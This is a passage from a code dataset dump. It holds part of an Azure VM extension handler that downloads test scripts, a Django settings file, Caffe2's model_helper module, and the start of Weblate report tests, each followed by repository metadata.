current_config = MyPatching.get_current_config()
        hutil.do_exit(0, 'Enable', 'success', '0', 'Oneoff Patch Succeeded. Current Configuration: ' + current_config)
except Exception, e:
current_config = MyPatching.get_current_config()
hutil.error("Failed to one-off patch with error: %s, stack trace: %s" %(str(e), traceback.format_exc()))
        hutil.do_exit(1, 'Enable', 'error', '0', 'Oneoff Patch Failed. Current Configuration: ' + current_config)
def download_files(hutil):
protected_settings = hutil.get_protected_settings()
public_settings = hutil.get_public_settings()
if protected_settings:
settings = protected_settings.copy()
else:
settings = dict()
if public_settings:
settings.update(public_settings)
local = settings.get("vmStatusTest", dict()).get("local", "")
if str(local).lower() == "true":
local = True
elif str(local).lower() == "false":
local = False
else:
hutil.log("WARNING: The parameter \"local\" "
"is empty or invalid. Set it as False. Continue...")
local = False
idle_test_script = settings.get("vmStatusTest", dict()).get('idleTestScript')
healthy_test_script = settings.get("vmStatusTest", dict()).get('healthyTestScript')
if (not idle_test_script and not healthy_test_script):
hutil.log("WARNING: The parameter \"idleTestScript\" and \"healthyTestScript\" "
"are both empty. Exit downloading VMStatusTest scripts...")
return
elif local:
if (idle_test_script and idle_test_script.startswith("http")) or \
(healthy_test_script and healthy_test_script.startswith("http")):
hutil.log("WARNING: The parameter \"idleTestScript\" or \"healthyTestScript\" "
"should not be uri. Exit downloading VMStatusTest scripts...")
return
elif not local:
if (idle_test_script and not idle_test_script.startswith("http")) or \
(healthy_test_script and not healthy_test_script.startswith("http")):
hutil.log("WARNING: The parameter \"idleTestScript\" or \"healthyTestScript\" "
"should be uri. Exit downloading VMStatusTest scripts...")
return
hutil.do_status_report('Downloading','transitioning', '0',
'Downloading VMStatusTest scripts...')
vmStatusTestScripts = dict()
vmStatusTestScripts[idle_test_script] = idleTestScriptName
vmStatusTestScripts[healthy_test_script] = healthyTestScriptName
if local:
hutil.log("Saving VMStatusTest scripts from user's configurations...")
for src,dst in vmStatusTestScripts.items():
if not src:
continue
file_path = save_local_file(src, dst, hutil)
preprocess_files(file_path, hutil)
return
storage_account_name = None
storage_account_key = None
if settings:
storage_account_name = settings.get("storageAccountName", "").strip()
storage_account_key = settings.get("storageAccountKey", "").strip()
if storage_account_name and storage_account_key:
hutil.log("Downloading VMStatusTest scripts from azure storage...")
for src,dst in vmStatusTestScripts.items():
if not src:
continue
file_path = download_blob(storage_account_name,
storage_account_key,
src,
dst,
hutil)
preprocess_files(file_path, hutil)
elif not(storage_account_name or storage_account_key):
hutil.log("No azure storage account and key specified in protected "
"settings. Downloading VMStatusTest scripts from external links...")
for src,dst in vmStatusTestScripts.items():
if not src:
continue
file_path = download_external_file(src, dst, hutil)
preprocess_files(file_path, hutil)
else:
#Storage account and key should appear in pairs
error_msg = "Azure storage account or storage key is not provided"
hutil.error(error_msg)
raise ValueError(error_msg)
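# Illustrative settings fragment consumed by download_files() above (an
# assumption for documentation only; real values come from the extension's
# protected/public settings):
#
#     {
#         "vmStatusTest": {
#             "local": "false",
#             "idleTestScript": "https://example.com/idleTest.py",
#             "healthyTestScript": "https://example.com/healthyTest.py"
#         },
#         "storageAccountName": "mystorageaccount",
#         "storageAccountKey": "<key>"
#     }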
def download_blob(storage_account_name, storage_account_key,
blob_uri, dst, hutil):
seqNo = hutil.get_seq_no()
container_name = get_container_name_from_uri(blob_uri)
blob_name = get_blob_name_from_uri(blob_uri)
download_dir = prepare_download_dir(seqNo)
download_path = os.path.join(download_dir, dst)
#Guest agent already ensure the plugin is enabled one after another.
#The blob download will not conflict.
blob_service = BlobService(storage_account_name, storage_account_key)
try:
hutil.log("Downloading to {0}".format(download_path))
blob_service.get_blob_to_path(container_name, blob_name, download_path)
except Exception, e:
hutil.error(("Failed to download blob with uri:{0} "
"with error {1}").format(blob_uri,e))
raise
return download_path
def download_external_file(uri, dst, hutil):
seqNo = hutil.get_seq_no()
download_dir = prepare_download_dir(seqNo)
file_path = os.path.join(download_dir, dst)
try:
hutil.log("Downloading to {0}".format(file_path))
download_and_save_file(uri, file_path)
except Exception, e:
hutil.error(("Failed to download external file with uri:{0} "
"with error {1}").format(uri, e))
raise
return file_path
def save_local_file(src, dst, hutil):
seqNo = hutil.get_seq_no()
download_dir = prepare_download_dir(seqNo)
file_path = os.path.join(download_dir, dst)
try:
hutil.log("Downloading to {0}".format(file_path))
waagent.SetFileContents(file_path, src)
except Exception, e:
hutil.error(("Failed to save file from user's configuration "
"with error {0}").format(e))
raise
return file_path
def preprocess_files(file_path, hutil):
"""
Preprocess the text file. If it is a binary file, skip it.
"""
is_text, code_type = is_text_file(file_path)
if is_text:
dos2unix(file_path)
hutil.log("Converting text files from DOS to Unix formats: Done")
if code_type in ['UTF-8', 'UTF-16LE', 'UTF-16BE']:
remove_bom(file_path)
hutil.log("Removing BOM: Done")
def is_text_file(file_path):
with open(file_path, 'rb') as f:
contents = f.read(512)
return is_text(contents)
def is_text(contents):
supported_encoding = ['ascii', 'UTF-8', 'UTF-16LE', 'UTF-16BE']
# Openlogic and Oracle distros don't have python-chardet
waagent.Run('yum -y install python-chardet', False)
import chardet
code_type = chardet.detect(contents)['encoding']
if code_type in supported_encoding:
return True, code_type
else:
return False, code_type
def dos2unix(file_path):
temp_file_path = tempfile.mkstemp()[1]
f_temp = open(temp_file_path, 'wb')
with open(file_path, 'rU') as f:
contents = f.read()
f_temp.write(contents)
f_temp.close()
shutil.move(temp_file_path, file_path)
def remove_bom(file_path):
temp_file_path = tempfile.mkstemp()[1]
f_temp = open(temp_file_path, 'wb')
with open(file_path, 'rb') as f:
contents = f.read()
for encoding in ["utf-8-sig", "utf-16"]:
try:
f_temp.write(contents.decode(encoding).encode('utf-8'))
break
except UnicodeDecodeError:
continue
f_temp.close()
shutil.move(temp_file_path, file_path)
def download_and_save_file(uri, file_path):
src = urllib2.urlopen(uri)
dest = open(file_path, 'wb')
buf_size = 1024
buf = src.read(buf_size)
while(buf):
dest.write(buf)
buf = src.read(buf_size)
def prepare_download_dir(seqNo):
download_dir_main = os.path.join(os.getcwd(), DownloadDirectory)
create_directory_if_not_exists(download_dir_main)
download_dir = os.path.join(download_dir_main, seqNo)
create_directory_if_not_exists(download_dir)
return download_dir
def create_directory_if_not_exists(directory):
"""create directory if no exists"""
if not os.path.exists(directory):
os.makedirs(directory)
def get_path_from_uri(uriStr):
uri = urlparse.urlparse(uriStr)
return uri.path
def get_blob_name_from_uri(uri):
return get_properties_from_uri(uri)['blob_name']
def get_container_name_from_uri(uri):
return get_properties_from_uri(uri)['container_name']
def get_properties_from_uri(uri):
path = get_path_from_uri(uri)
if path.endswith('/'):
path = path[:-1]
if path[0] == '/':
path = path[1:]
first_sep = path.find('/')
if first_sep == -1:
hutil.error("Failed to extract container, blob, from {}".format(path))
blob_name = path[first_sep+1:]
container_name = path[:first_sep]
return {'blob_name': blob_name, 'container_name': container_name}
def download_customized_vmstatustest():
download_dir = prepare_download_dir(hutil.get_seq_no())
maxRetry = 2
for retry in range(0, maxRetry + 1):
try:
download_files(hutil)
break
except Exception, e:
hutil.error("Failed to download files, retry=" + str(retry) + ", maxRetry=" + str(maxRetry))
if retry != maxRetry:
hutil.log("Sleep 10 seconds")
time.sleep(10)
else:
raise
def copy_vmstatustestscript(seqNo, oneoff):
src_dir = prepare_download_dir(seqNo)
for filename in (idleTestScriptName, healthyTestScriptName):
src = os.path.join(src_dir, filename)
if oneoff is not None and str(oneoff).lower() == "true":
dst = "oneoff"
else:
dst = "scheduled"
dst = os.path.join(os.getcwd(), dst)
current_vmstatustestscript = os.path.join(dst, filename)
if os.path.isfile(current_vmstatustestscript):
os.remove(current_vmstatustestscript)
# Remove the .pyc file
if os.path.isfile(current_vmstatustestscript+'c'):
os.remove(current_vmstatustestscript+'c')
if os.path.isfile(src):
shutil.copy(src, dst)
# Main function is the only entrance to this extension handler
def main():
waagent.LoggerInit('/var/log/waagent.log', '/dev/stdout')
waagent.Log("%s started to handle." %(ExtensionShortName))
global hutil
hutil = Util.HandlerUtility(waagent.Log, waagent.Error)
global MyPatching
MyPatching = GetMyPatching(hutil)
if MyPatching is None:
sys.exit(1)
for a in sys.argv[1:]:
if re.match("^([-/]*)(disable)", a):
disable()
elif re.match("^([-/]*)(uninstall)", a):
uninstall()
elif re.match("^([-/]*)(install)", a):
install()
elif re.match("^([-/]*)(enable)", a):
enable()
elif re.match("^([-/]*)(update)", a):
update()
elif re.match("^([-/]*)(download)", a):
download()
elif re.match("^([-/]*)(patch)", a):
patch()
elif re.match("^([-/]*)(oneoff)", a):
oneoff()
if __name__ == '__main__':
main()
| apache-2.0 | -6,010,134,014,404,228,000 | 37.362832 | 228 | 0.627047 | false |
outvader/soclone | soclone/settings.py | 4 | 3026 | """SOClone settings.
A ``local_settings`` module must be made available to define sensitive
and highly installation-specific settings.
The following is a template for the settings which should be provided by
the ``local_settings`` module::
# Database settings
DATABASE_ENGINE = ''
DATABASE_NAME = ''
DATABASE_USER = ''
DATABASE_PASSWORD = ''
DATABASE_HOST = ''
DATABASE_PORT = ''
# URL that handles the media served from MEDIA_ROOT
MEDIA_URL = ''
# Make this unique and don't share it with anybody
SECRET_KEY = ''
"""
import os
DIRNAME = os.path.dirname(__file__)
DEBUG = True
TEMPLATE_DEBUG = DEBUG
USE_I8N = False
ADMINS = ()
MANAGERS = ADMINS
# Local time zone for this installation. All choices can be found here:
# http://www.postgresql.org/docs/current/static/datetime-keywords.html#DATETIME-TIMEZONE-SET-TABLE
TIME_ZONE = 'Europe/Belfast'
# Language code for this installation. All choices can be found here:
# http://www.w3.org/TR/REC-html40/struct/dirlang.html#langcodes
# http://blogs.law.harvard.edu/tech/stories/storyReader$15
LANGUAGE_CODE = 'en-gb'
SITE_ID = 1
# Absolute path to the directory that holds media
# Example: "/home/media/media.lawrence.com/"
MEDIA_ROOT = os.path.join(DIRNAME, 'media')
# URL prefix for admin media -- CSS, JavaScript and images. Make sure to use a
# trailing slash.
# Examples: "http://foo.com/media/", "/media/"
ADMIN_MEDIA_PREFIX = '/admin_media/'
# List of callables that know how to import templates from various sources.
TEMPLATE_LOADERS = (
'django.template.loaders.filesystem.load_template_source',
'django.template.loaders.app_directories.load_template_source',
)
# List of processors used by RequestContext to populate the context.
# Each one should be a callable that takes the request object as its
# only parameter and returns a dictionary to add to the context.
TEMPLATE_CONTEXT_PROCESSORS = (
'soclone.context_processors.auth',
'django.core.context_processors.debug',
'django.core.context_processors.media',
'soclone.context_processors.request_path',
)
# List of middleware classes to use. Order is important; in the request phase,
# this middleware classes will be applied in the order given, and in the
# response phase the middleware will be applied in reverse order.
MIDDLEWARE_CLASSES = (
'django.middleware.common.CommonMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.middleware.doc.XViewMiddleware',
'django.middleware.transaction.TransactionMiddleware',
)
ROOT_URLCONF = 'soclone.urls'
TEMPLATE_DIRS = (
os.path.join(DIRNAME, 'templates'),
)
INSTALLED_APPS = (
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.humanize',
'django_html',
'soclone',
)
LOGIN_URL = '/login/'
LOGIN_REDIRECT_URL = '/'
LOGOUT_URL = '/logout/'
try:
from soclone.local_settings import *
except ImportError:
pass
| mit | 7,243,192,881,112,871,000 | 28.096154 | 98 | 0.727032 | false |
bwasti/caffe2 | caffe2/python/model_helper.py | 1 | 22712 | ## @package model_helper
# Module caffe2.python.model_helper
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
from caffe2.python import core, scope, workspace
from caffe2.python.modeling import parameter_info
from caffe2.python.modeling.parameter_sharing import (
parameter_sharing_context,
)
from caffe2.python.optimizer_context import (
OptimizerContext,
DEFAULT_OPTIM,
)
from caffe2.proto import caffe2_pb2
from future.utils import viewitems, viewkeys
from itertools import chain
import logging
import six
# _known_working_ops are operators that do not need special care.
_known_working_ops = [
"Accuracy",
"Adam",
"Add",
"Adagrad",
"SparseAdagrad",
"AveragedLoss",
"Cast",
"Checkpoint",
"ConstantFill",
"Copy",
"CopyGPUToCPU",
"CopyCPUToGPU",
"DequeueBlobs",
"EnsureCPUOutput",
"ExpandDims",
"Flatten",
"FlattenToVec",
"LabelCrossEntropy",
"LearningRate",
"MakeTwoClass",
"MatMul",
"NCCLAllreduce",
"NHWC2NCHW",
"PackSegments",
"Print",
"PRelu",
"Scale",
"ScatterWeightedSum",
"Sigmoid",
"SortedSegmentSum",
"Snapshot", # Note: snapshot is deprecated, use Checkpoint
"Softmax",
"SoftmaxWithLoss",
"SquaredL2Distance",
"Squeeze",
"StopGradient",
"Summarize",
"Tanh",
"Transpose",
"UnpackSegments",
"WeightedSum",
"ReduceFrontSum",
]
class ModelHelper(object):
"""A helper model so we can manange models more easily. It contains net def
and parameter storages. You can add an Operator yourself, e.g.
model = model_helper.ModelHelper(name="train_net")
# init your weight and bias as w and b
w = model.param_init_net.XavierFill(...)
b = model.param_init_net.ConstantFill(...)
fc1 = model.FC([input, w, b], output, **kwargs)
or you can use helper functions in brew module without manually
defining parameter initializations and operators.
model = model_helper.ModelHelper(name="train_net")
fc1 = brew.fc(model, input, output, dim_in, dim_out, **kwargs)
"""
def __init__(self, name=None, init_params=True, allow_not_known_ops=True,
skip_sparse_optim=False, param_model=None, arg_scope=None):
self.name = name or "model"
self.net = core.Net(self.name)
if param_model is not None:
self.param_init_net = param_model.param_init_net
self.param_to_grad = param_model.param_to_grad
self.params = param_model.params
self._parameters_info = param_model._parameters_info
self._computed_params = param_model._computed_params
else:
self.param_init_net = core.Net(self.name + '_init')
self.param_to_grad = {}
self.params = []
self._parameters_info = {}
self._computed_params = []
self._param_info_deprecated = []
self._devices = []
self.gradient_ops_added = False
self.init_params = init_params
self.allow_not_known_ops = allow_not_known_ops
self.skip_sparse_optim = skip_sparse_optim
self.weights = []
self.biases = []
self._arg_scope = {
'order': "NCHW",
'use_cudnn': True,
'cudnn_exhaustive_search': False,
}
if arg_scope is not None:
# Please notice value as None is not acceptable. We are not checking it
# here because we already have check in MakeArgument.
self._arg_scope.update(arg_scope)
@property
def arg_scope(self):
return self._arg_scope
def get_name(self):
return self.name
def _infer_param_shape(self, param):
for op in self.param_init_net.Proto().op:
if str(param) in op.output:
for arg in op.arg:
if arg.name == "shape":
return list(arg.ints)
return None
def _update_param_info_deprecated(self):
assert len(self._param_info_deprecated) <= len(self.params)
for param in self.params[len(self._param_info_deprecated):]:
if not isinstance(param, core.BlobReference):
raise ValueError(
"Param %s must be a BlobReference!" % str(param))
self._param_info_deprecated.append(parameter_info.ParameterInfo(
param_id=len(self._param_info_deprecated),
param=param,
shape=self._infer_param_shape(param)))
for info in self._param_info_deprecated:
info.grad = self.param_to_grad.get(info.name)
def _normalize_tags(self, tags):
tags = tags or []
return set(tags) if isinstance(tags, list) else set([tags])
def create_param(self, param_name, shape, initializer, tags=None):
"""
Creates parameter with a given name and initializer.
        If param_name is an instance of BlobReference, then this blob will be
        used to store the parameter (no sharing logic will affect its location).
        If param_name is an instance of a string type, then the final blob will
        be created in the CurrentNameScope with respect to all parameter
        sharing logic, i.e. 'resolved_name_scope/param_name'.
        Parameter sharing logic overrides CurrentNameScope according
        to the rules that are specified through ParameterSharing contexts;
        all ParameterSharing contexts are applied recursively until there are no
        extra overrides present, where on each step the best match will be
        applied first.
The following examples should clarify the way ParameterSharing logic
works:
As an example if this function is called with parameter 'w':
a. Call from some scope 'global_scope' with no Parameter sharing:
'global_scope/w'
b. Call from scope 'scope_b', with override {'scope_b': 'scope_a'}:
'scope_a/w'
c. Call from scope 'scope_a', with override {'scope_a': ''}:
'scope_a/w'
d. Call from scope 'scope_b/shared', with overrides
{'scope_b/shared': 'scope_b', 'scope_b': 'scope_a'}:
'scope_a/w'
        e. Call from scope 'scope_b/unshared', with overrides
{'scope_b/shared': 'scope_b', 'scope_b': 'scope_a'}:
'scope_a/unshared/w'
"""
# ParameterSharing works only for case when param_name is instance of
# a string type. If param_name is a BlobReference - no attempt for
# ParameterSharing will be applied.
if isinstance(param_name, core.BlobReference):
param_name = str(param_name)
elif isinstance(param_name, six.string_types):
# Parameter name will be equal to current Namescope that got
            # resolved with respect to the parameter sharing of the scopes.
param_name = parameter_sharing_context.get_parameter_name(
param_name)
else:
raise "Unsupported type for param_name"
if param_name in self._parameters_info:
assert self._parameters_info[param_name].shape == shape
return self._parameters_info[param_name].blob
param_info = initializer.create_param(
param_name=core.BlobReference(param_name),
init_net=self.param_init_net,
shape=shape,
)
optim_context = OptimizerContext.current()
for tag in self._normalize_tags(tags):
if optim_context.has_optimizer(tag):
# param_info will check optimizer has not been set
param_info.optimizer = optim_context.get_optimizer(tag)
if not param_info.optimizer and optim_context.has_optimizer(DEFAULT_OPTIM):
param_info.optimizer = optim_context.get_optimizer(DEFAULT_OPTIM)
self._parameters_info[param_name] = param_info
# Add param to legacy structs as well, so all other functions for
# parameters are still working.
self.AddParameter(param_info.blob, tags)
return param_info.blob
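    # Hedged usage sketch for the parameter-sharing rules documented above
    # (assumes ParameterSharing from caffe2.python.modeling.parameter_sharing
    # and Initializer from caffe2.python.modeling.initializers; verify against
    # your Caffe2 version):
    #
    #     from caffe2.python import scope
    #     from caffe2.python.modeling.parameter_sharing import ParameterSharing
    #     from caffe2.python.modeling.initializers import Initializer
    #
    #     with scope.NameScope('scope_b'):
    #         with ParameterSharing({'scope_b': 'scope_a'}):
    #             w = model.create_param('w', shape=[10],
    #                                    initializer=Initializer())
    #     # w resolves to 'scope_a/w' (case b. above)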
def get_param_info(self, param):
assert isinstance(param, core.BlobReference), \
"Param {} is not a BlobReference".format(param)
return self._parameters_info.get(param, None)
# This method is deprecated, use create_param method which
# also does parameter initialization when needed
def add_param_DEPRECATED(self, param, key=None, shape=None, length=None):
logging.warning("add_param method is DEPRECATED")
self._update_param_info_deprecated()
self.AddParameter(param)
if key is not None and self.net.input_record() is not None:
idx = self.net.input_record().field_blobs().index(key)
key = self.net.input_record().field_names()[idx]
shape = shape if shape is not None else self._infer_param_shape(param)
if not isinstance(param, core.BlobReference):
raise ValueError("Param %s must be a BlobReference!" % str(param))
self._param_info_deprecated.append(parameter_info.ParameterInfo(
param_id=len(self._param_info_deprecated),
param=param,
shape=shape,
key=key,
length=length,
))
return self._param_info_deprecated[-1]
# This method is deprecated, use get_param_info method
def param_info(self, grad_type=None, id=None):
logging.info("param_info method is DEPRECATED")
self._update_param_info_deprecated()
if id is not None:
assert grad_type is None
info = self._param_info_deprecated[id]
assert info.param_id == id
return info
elif grad_type is not None:
return [
info for info in self._param_info_deprecated
if info.grad_type() == grad_type]
else:
return self._param_info_deprecated
def AddParameter(self, param, tags=None):
assert isinstance(param, core.BlobReference)
tags = self._normalize_tags(tags)
if parameter_info.ParameterTags.COMPUTED_PARAM in tags:
self._computed_params.append(param)
else:
self.params.append(param)
if parameter_info.ParameterTags.WEIGHT in tags:
self.weights.append(param)
if parameter_info.ParameterTags.BIAS in tags:
self.biases.append(param)
@staticmethod
def _NormalizeNamescope(namescope):
if namescope is None:
return scope.CurrentNameScope()
elif namescope == '' or namescope.endswith(scope._NAMESCOPE_SEPARATOR):
return namescope
else:
return namescope + scope._NAMESCOPE_SEPARATOR
def GetParams(self, namescope=None, top_scope=False):
'''
Returns the params in current namescope
'''
namescope = ModelHelper._NormalizeNamescope(namescope)
if namescope == '':
return self.params[:]
elif top_scope:
return [
p for p in self.params
if p.GetNameScope().startswith(namescope)
]
else:
return [p for p in self.params if
p.GetNameScope().startswith(namescope)]
def Proto(self):
return self.net.Proto()
def InitProto(self):
return self.param_init_net.Proto()
def RunAllOnGPU(self, *args, **kwargs):
self.param_init_net.RunAllOnGPU(*args, **kwargs)
self.net.RunAllOnGPU(*args, **kwargs)
def CreateDB(self, blob_out, db, db_type, **kwargs):
dbreader = self.param_init_net.CreateDB(
[], blob_out, db=db, db_type=db_type, **kwargs)
return dbreader
def AddGradientOperators(self, *args, **kwargs):
if self.gradient_ops_added:
raise RuntimeError("You cannot run AddGradientOperators twice.")
self.Validate()
self.gradient_ops_added = True
self.grad_map = self.net.AddGradientOperators(*args, **kwargs)
self.param_to_grad = self.get_param_to_grad(self.params)
# Populate ParameterInfo for all parameters if missing
# and add gradient blob information. So optimizers can use it
for param, grad in self.param_to_grad.items():
param_info = self.get_param_info(param)
if param_info:
param_info.grad = grad
else:
self._parameters_info[param] = parameter_info.ParameterInfo(
param_id=None,
param=param,
grad=grad,
)
return self.grad_map
def get_param_to_grad(self, params):
'''
Given a list of parameters returns a dict from a parameter
to a corresponding gradient
'''
param_to_grad = {}
if not self.gradient_ops_added:
raise RuntimeError("You need to run AddGradientOperators first.")
# We need to use empty namescope when creating the gradients
# to prevent duplicating the namescope prefix for gradient blobs.
for p in params:
if str(p) in self.grad_map:
param_to_grad[p] = self.grad_map[str(p)]
return param_to_grad
def GetOptimizationParamInfo(self, params=None):
'''
Returns a map for param => grad.
If params is not specified, all parameters will be considered.
'''
if not self.gradient_ops_added:
raise RuntimeError("Need to call AddGradientOperators first")
param_to_grad = self.param_to_grad
if params:
param_to_grad = self.get_param_to_grad(params)
return [
self.get_param_info(param) for param, grad in viewitems(param_to_grad)
if (
not self.skip_sparse_optim or
not isinstance(grad, core.GradientSlice)
)
]
def _Validate(self):
'''
Check for duplicate params
'''
params_list = [str(p) for p in self.params]
params_set = set(params_list)
dupes = []
if len(params_set) != len(params_list):
params_list = sorted(params_list)
for j, p in enumerate(params_list):
if j > 0 and params_list[j - 1] == p:
if p not in dupes:
dupes.append(p)
return dupes
def Validate(self):
dupes = self._Validate()
assert dupes == [], "Duplicate params: {}".format(dupes)
def GetComputedParams(self, namescope=None):
'''
Returns the computed params in current namescope. 'Computed params'
are such parameters that are not optimized via gradient descent but are
directly computed from data, such as the running mean and variance
of Spatial Batch Normalization.
'''
namescope = ModelHelper._NormalizeNamescope(namescope)
if namescope == '':
return self._computed_params[:]
else:
return [p for p in self._computed_params
if p.GetNameScope().startswith(namescope)]
def GetAllParams(self, namescope=None):
return self.GetParams(namescope) + self.GetComputedParams(namescope)
def TensorProtosDBInput(
self, unused_blob_in, blob_out, batch_size, db, db_type, **kwargs
):
"""TensorProtosDBInput."""
dbreader_name = "dbreader_" + db
dbreader = self.param_init_net.CreateDB(
[], dbreader_name,
db=db, db_type=db_type)
return self.net.TensorProtosDBInput(
dbreader, blob_out, batch_size=batch_size)
def GetDevices(self):
assert len(self._devices) > 0, \
"Use data_parallel_model to run model on multiple GPUs."
return self._devices
def __getattr__(self, op_type):
"""Catch-all for all other operators, mostly those without params."""
if op_type.startswith('__'):
raise AttributeError(op_type)
if not core.IsOperator(op_type):
raise RuntimeError(
'Method ' + op_type + ' is not a registered operator.' +
' Did you mean: [' +
','.join(workspace.C.nearby_opnames(op_type)) + ']'
)
if op_type not in _known_working_ops:
if not self.allow_not_known_ops:
raise RuntimeError(
"Operator {} is not known to be safe".format(op_type))
logging.warning("You are creating an op that the ModelHelper "
"does not recognize: {}.".format(op_type))
return self.net.__getattr__(op_type)
def __dir__(self):
return sorted(set(chain(
dir(type(self)),
viewkeys(self.__dict__),
_known_working_ops
)))
def ExtractPredictorNet(
net_proto,
input_blobs,
output_blobs,
device=None,
renames=None,
disabled_inputs=None,
):
'''
Takes a model net for training and returns a net which can be
used for prediction. For example, all gradient operators and
input operators are removed.
@param net_proto protobuf of the net you want to process (net.Proto())
@param input_blobs list/set of blob names that are the inputs of predictor
@param output_blobs list/set of blob names that are outputs of predictor
@param device optional device option that is assigned
@param renames dictionary of blob name to a new name (optional)
@param disabled_inputs optional set of blobs that are 'switched off'. This
will cause branches with those blobs as inputs to be removed
'''
predict_net = core.Net(net_proto.name + "_predict")
predict_proto = predict_net.Proto()
orig_external_inputs = set(net_proto.external_input)
orig_external_outputs = set(net_proto.external_output)
input_blobs = {str(b) for b in input_blobs}
known_blobs = set(orig_external_inputs).union(input_blobs)
output_blobs = {str(b) for b in output_blobs}
external_inputs = set(input_blobs)
external_outputs = set(output_blobs)
if renames is None:
renames = {}
if disabled_inputs is not None:
known_blobs = known_blobs - set(disabled_inputs)
ops = list(net_proto.op)
# Find the range of ops that we should include
try:
first_op_with_input = min(
[
j for j in range(len(ops))
if input_blobs.intersection(ops[j].input) and ops[j].type !=
'StopGradient'
]
)
except ValueError:
raise Exception("No ops with input={}".format(input_blobs))
try:
last_op_with_output = max(
[
j for j in range(len(ops))
if output_blobs.intersection(ops[j].output)
]
)
except ValueError:
raise Exception("No ops with output={}".format(output_blobs))
def validate_op(op):
# Check that the op does not have is_test = 0 set. This is a common
        # pitfall with the SpatialBN op, at least.
for arg in op.arg:
if arg.name == "is_test" and arg.i == 0:
raise Exception(
"An operator had is_test=0, did you try to extract a " +
"predictor from a train model (instead of test model)?" +
" Op was: {}".format(str(op))
)
# Iterate through the ops and only include those whose inputs
# we can satisfy.
for op in ops[first_op_with_input:(last_op_with_output + 1)]:
if known_blobs.issuperset(op.input):
# Special handling for recurrent nets
# TODO: when standard argument type for "nets" is introduced,
# this can be more general
if op.type == 'RecurrentNetwork':
import google.protobuf.text_format as protobuftx
for arg in op.arg:
if arg.name == 'backward_step_net':
arg.s = b""
elif arg.name == 'step_net':
step_proto = caffe2_pb2.NetDef()
protobuftx.Merge(arg.s.decode("ascii"), step_proto)
for step_op in step_proto.op:
if device is not None:
step_op.device_option.device_type = device.device_type
step_op.device_option.cuda_gpu_id = device.cuda_gpu_id
# Add additional external inputs
external_inputs.update(
set(step_proto.external_input).intersection(
orig_external_inputs
)
)
arg.s = str(step_proto).encode("ascii")
if device is not None:
op.device_option.device_type = device.device_type
op.device_option.cuda_gpu_id = device.cuda_gpu_id
validate_op(op)
predict_proto.op.extend([op])
known_blobs.update(op.output)
external_inputs.update(
set(op.input).intersection(orig_external_inputs)
)
external_outputs.update(
set(op.output).intersection(orig_external_outputs)
)
else:
logging.debug(
"Op {} had unknown inputs: {}".format(
op.type, set(op.input).difference(known_blobs)
)
)
def rename_list(proto_list):
# proto lists don't support assignments
new_list = proto_list[:]
for j, b in enumerate(new_list):
if b in renames:
new_list[j] = renames[b]
del proto_list[:]
proto_list.extend(new_list)
# Predictor net's external inputs and outputs include only those
# that are part of this net.
predict_proto.external_input.extend(external_inputs)
predict_proto.external_output.extend(external_outputs)
rename_list(predict_proto.external_input)
rename_list(predict_proto.external_output)
renamed_input_blobs = []
for b in input_blobs:
if b in renames:
renamed_input_blobs.append(renames[b])
else:
renamed_input_blobs.append(b)
for op in predict_proto.op:
rename_list(op.input)
rename_list(op.output)
return predict_net, list(
set(predict_proto.external_input) - set(renamed_input_blobs)
)
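# Minimal usage sketch (blob names are assumptions for illustration; pass the
# blobs your trained model actually exposes):
#
#     predict_net, extra_inputs = ExtractPredictorNet(
#         net_proto=train_model.net.Proto(),
#         input_blobs=['data'],
#         output_blobs=['softmax'],
#     )
#     # predict_net is a core.Net ready for inference; extra_inputs lists the
#     # remaining external inputs (typically learned parameters).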
| apache-2.0 | 2,902,912,391,106,800,000 | 35.691438 | 86 | 0.591273 | false |
matejcik/weblate | weblate/trans/tests/test_reports.py | 3 | 5000 | # -*- coding: utf-8 -*-
#
# Copyright © 2012 - 2016 Michal Čihař <[email protected]>
#
# This file is part of Weblate <https://weblate.org/>
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
from __future__ import unicode_literals
from datetime import timedelta
import json
from django.core.urlresolvers import reverse
from django.utils import timezone
from weblate.trans.tests.test_views import ViewTestCase
from weblate.trans.views.reports import generate_credits, generate_counts
class ReportsTest(ViewTestCase):
def setUp(self):
super(ReportsTest, self).setUp()
self.user.is_superuser = True
self.user.save()
def add_change(self):
self.edit_unit(
'Hello, world!\n',
'Nazdar svete!\n'
)
def test_credits_empty(self):
data = generate_credits(
self.subproject,
timezone.now() - timedelta(days=1),
timezone.now() + timedelta(days=1)
)
self.assertEqual(data, [])
def test_credits_one(self):
self.add_change()
data = generate_credits(
self.subproject,
timezone.now() - timedelta(days=1),
timezone.now() + timedelta(days=1)
)
self.assertEqual(
data,
[{'Czech': [('[email protected]', 'Weblate Test')]}]
)
def test_credits_more(self):
self.edit_unit(
'Hello, world!\n',
'Nazdar svete2!\n'
)
self.test_credits_one()
def get_credits(self, style):
self.add_change()
return self.client.post(
reverse('credits', kwargs=self.kw_subproject),
{
'style': style,
'start_date': '2000-01-01',
'end_date': '2100-01-01'
},
)
def test_credits_view_json(self):
response = self.get_credits('json')
data = json.loads(response.content.decode('utf-8'))
self.assertEqual(
data,
[{'Czech': [['[email protected]', 'Weblate Test']]}]
)
def test_credits_view_rst(self):
response = self.get_credits('rst')
self.assertEqual(
response.content.decode('utf-8'),
'\n\n* Czech\n\n * Weblate Test <[email protected]>\n\n'
)
def test_credits_view_html(self):
response = self.get_credits('html')
self.assertHTMLEqual(
response.content.decode('utf-8'),
'<table>\n'
'<tr>\n<th>Czech</th>\n'
'<td><ul><li><a href="mailto:[email protected]">'
'Weblate Test</a></li></ul></td>\n</tr>\n'
'</table>'
)
def test_counts_one(self):
self.add_change()
data = generate_counts(
self.subproject,
timezone.now() - timedelta(days=1),
timezone.now() + timedelta(days=1)
)
self.assertEqual(
data,
[{
'count': 1,
'name': 'Weblate Test',
'words': 2,
'email': '[email protected]'
}]
)
def get_counts(self, style):
self.add_change()
return self.client.post(
reverse('counts', kwargs=self.kw_subproject),
{
'style': style,
'start_date': '2000-01-01',
